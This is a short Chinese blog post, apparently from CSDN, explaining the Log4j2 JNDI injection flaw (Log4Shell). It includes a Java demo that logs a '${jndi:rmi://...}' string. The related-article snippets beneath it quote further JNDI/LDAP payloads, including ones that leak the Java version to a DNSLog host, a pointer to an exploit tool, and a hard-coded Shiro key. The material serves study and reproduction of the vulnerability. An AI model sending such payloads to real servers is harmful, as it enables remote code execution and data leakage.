log4j2反序列化

已于 2024-04-16 16:23:13 修改
阅读量160 收藏 1
点赞数 5
分类专栏: 漏洞原理 文章标签: log4j
于 2024-04-13 14:27:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62688091/article/details/137714547
版权
这篇文章讨论了log4j2在Java程序中的使用,特别关注了一个关键漏洞,涉及JNDI/RMI的回显功能,可能导致安全风险。
摘要由CSDN通过智能技术生成
        log4j2作为一个优秀的 java 程序日志监控组件,被应用在了各种各样的衍生框架中,同时也是作为目前 java 全生态中的基础组件之一,这类组件一旦崩塌将造成不可估量的影响。
public class Client {
private static final Logger logger = LogManager . getLogger ();
public static void main ( String [] args ) throws NamingException {
System . setProperty ( "com.sun.jndi.rmi.object.trustURLCodebase" , "true" );
String userName = "${jndi:rmi://127.0.0.1:1099/test}" ;
logger . info ( " 看看存的是啥: {}" , userName );
}
}
${jndi:rmi://127.0.0.1:1099/test}
log4j2主要的一点是它的payload:jndi:rmi// DNSLog Platform/xxx,有回显存在log4j2的java反序列的日志漏洞。
        
感思
关注
专栏目录
【Java小姿势】Log4j2漏洞的前世今生
行雨斋
12-20 2931
A.源起 2021年12月9日,各大公司都被一个重量级漏洞引爆了,该漏洞一旦被攻击者利用就会造成及其严重的影响。经过快速分析和确认,该漏洞影响范围极其广泛,危害极其严重。然后从10日凌晨开始很多公司的程序员都被迫开始应急相应,加班加点修复问题。该漏洞涉及包含但不限于Struts2、Flink、ElasticSearch、Druid、dubbo、Redis、kafka等常用应用和组件。 爆出这个漏洞的这就是大名鼎鼎的日志组件log4j2 。作为日志组件,在java领域基本上是再常见运用不过的了,而这个漏洞可以
log4j反序列化
2403_82795493的博客
02-19 1163
Log4j在处理消息转换时,会按照字符检测每条日志,当日志中包含${}时,则会将表达式的内容替换成真实的内容(即lookup接口查找得到的内容),使用LDAP或RMI协议,能从远程服务区上请求恶意的对象,对象在调用的过程中会被解析执行,导致了Log4j的漏洞。
log4j2反序列化漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-02 584
Log4j 是一个流行的Java日志框架,用于记录应用程序的日志信息并进行日志管理。它提供了高度可配置的日志输出,可以将日志信息输出到控制台、文件、数据库等多种目标。它采用了模块化的架构,包含多个组件,如日志器(Logger)、输出器(Appender)、格式器(Layout)、过滤器(Filter)等。这些组件可以根据需要进行配置和组合,以满足各种日志记录需求。
代码执行漏洞-Log4j2漏洞
最新发布
2301_78031880的博客
09-08 299
反弹Shell-base64加密。
框架漏洞--->Log4j2 && Shiro1.2.4反序列化基础
huohaowen的博客
03-06 1416
本文涉及log4j2反序列化基础,Kerberos,Docker
谈谈log4j反序列化
一个安全研究员
02-17 1335
文章发布在安全客:https://www.anquanke.com/post/id/195932
Apache Log4j反序列化命令执行漏洞
01-10
vulhub靶机里的这个漏洞里缺少了curl或者wget这些命令
java之log4j反序列化
weixin_45653478的博客
07-20 1234
Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议即可),并会通过名称从ldap服务端获取对应的Class文件,使用ClassLoader在本地加载Ldap服务端返回的Class类。
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中...
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效
06-07
对于Fastjson,需要注意其反序列化过程中的安全问题,因为恶意构造的JSON数据可能导致代码执行或信息泄露。 在使用这个BurpSuite插件时,可以先对目标应用进行常规扫描,然后通过插件深度分析日志记录和JSON处理...
Log4j2 反序列化漏洞原理与复现
FisrtBqy的博客
05-15 4665
Log4j2 RCE漏洞原理与复现
VULHUB复现log4j反序列化漏洞-CVE-2021-44228
carrot11223的博客
04-29 1175
下载利用工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。我是用了yakit生成了一个可用域名,当然直接去dnslog平台生成也可以,但是我用习惯这个地方了,还是相当好用的一款国产化漏洞挖掘集成器。看这篇文章吧直接:https://blog.csdn.net/FisrtBqy/article/details/130680143。bash编码一下:https://www.sqlsec.com/rce/
log4j2远程代码执行漏洞原理及复现
m0_57967573的博客
04-29 1684
log4j2 框架下的 lookup 查询服务提供了 {} 字段解析功能,传进去的值会被直接解析。例如 ${java:version} 会被替换为对应的 java 版本。这样如果不对 lookup 的出栈进行限制,就有可能让查询指向任何服务
一文了解反序列化漏洞
allintao的博客
03-21 1023
通过再cookie的rememberme字段中插入恶意payload触发shiro框架的rememberme的反序列化功能,导致任意代码执行shiro1.2.24中,提供了硬编码的AES密钥:kPH+bIxk5D2deZiIxcaaaA==由于开发人员未修改AES密钥而直接使用shiro框架,导致了该问题Fastjson是java的一个库,可以通过toJSONString()方法。
log4j反序列化漏洞详解及利用
Mr.Wang的博客
12-20 1万+
Log4j漏洞详解:带你体验一把hacker之路!
Log4j2漏洞复现
qq_46222050的博客
02-16 3043
Log4j2漏洞复现 payload : ${jndi:ldap://${sys:java.version}.xxx.dnslog.cn} ${jndi:rmi://${sys:java.version}.xxx.dnslog.cn} ${jndi:ldap://sb6vjj.dnslog.cn/exp} 1.环境配置: 靶机:kali220 vps:centos 攻击机:win10 2.测试漏洞 漏洞点在action参数,将poc输入之前,要现在dnslog申请一个地址。 构造payload:htt
log4j2-rce-2021-12-09漏洞原理及复现
qq_50854662的博客
10-15 996
log4j2-rce-2021-12-09漏洞原理及复现
log4j反序列化漏洞分析(CVE-2019-17571)
热门推荐
杭州七先生的个人博客
04-07 1万+
前言 Apache Log4j反序列化漏洞 影响版本 1.2.4 <= Apache Log4j <= 1.2.17 漏洞复现 idea新建一个项目,如下图所示: log4j: import org.apache.log4j.net.SimpleSocketServer; public class log4j { public static void main(String[] args) { System.out.println("Listening on port
log4j2是不是java的反序列化漏洞
05-17
具体来说,该漏洞存在于log4j-core模块中的JMS Appender组件中,攻击者可以利用该漏洞通过特制的JMS消息触发反序列化漏洞,从而在受影响的应用程序上执行恶意代码。该漏洞已经被公开披露并得到了广泛的关注,建议...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值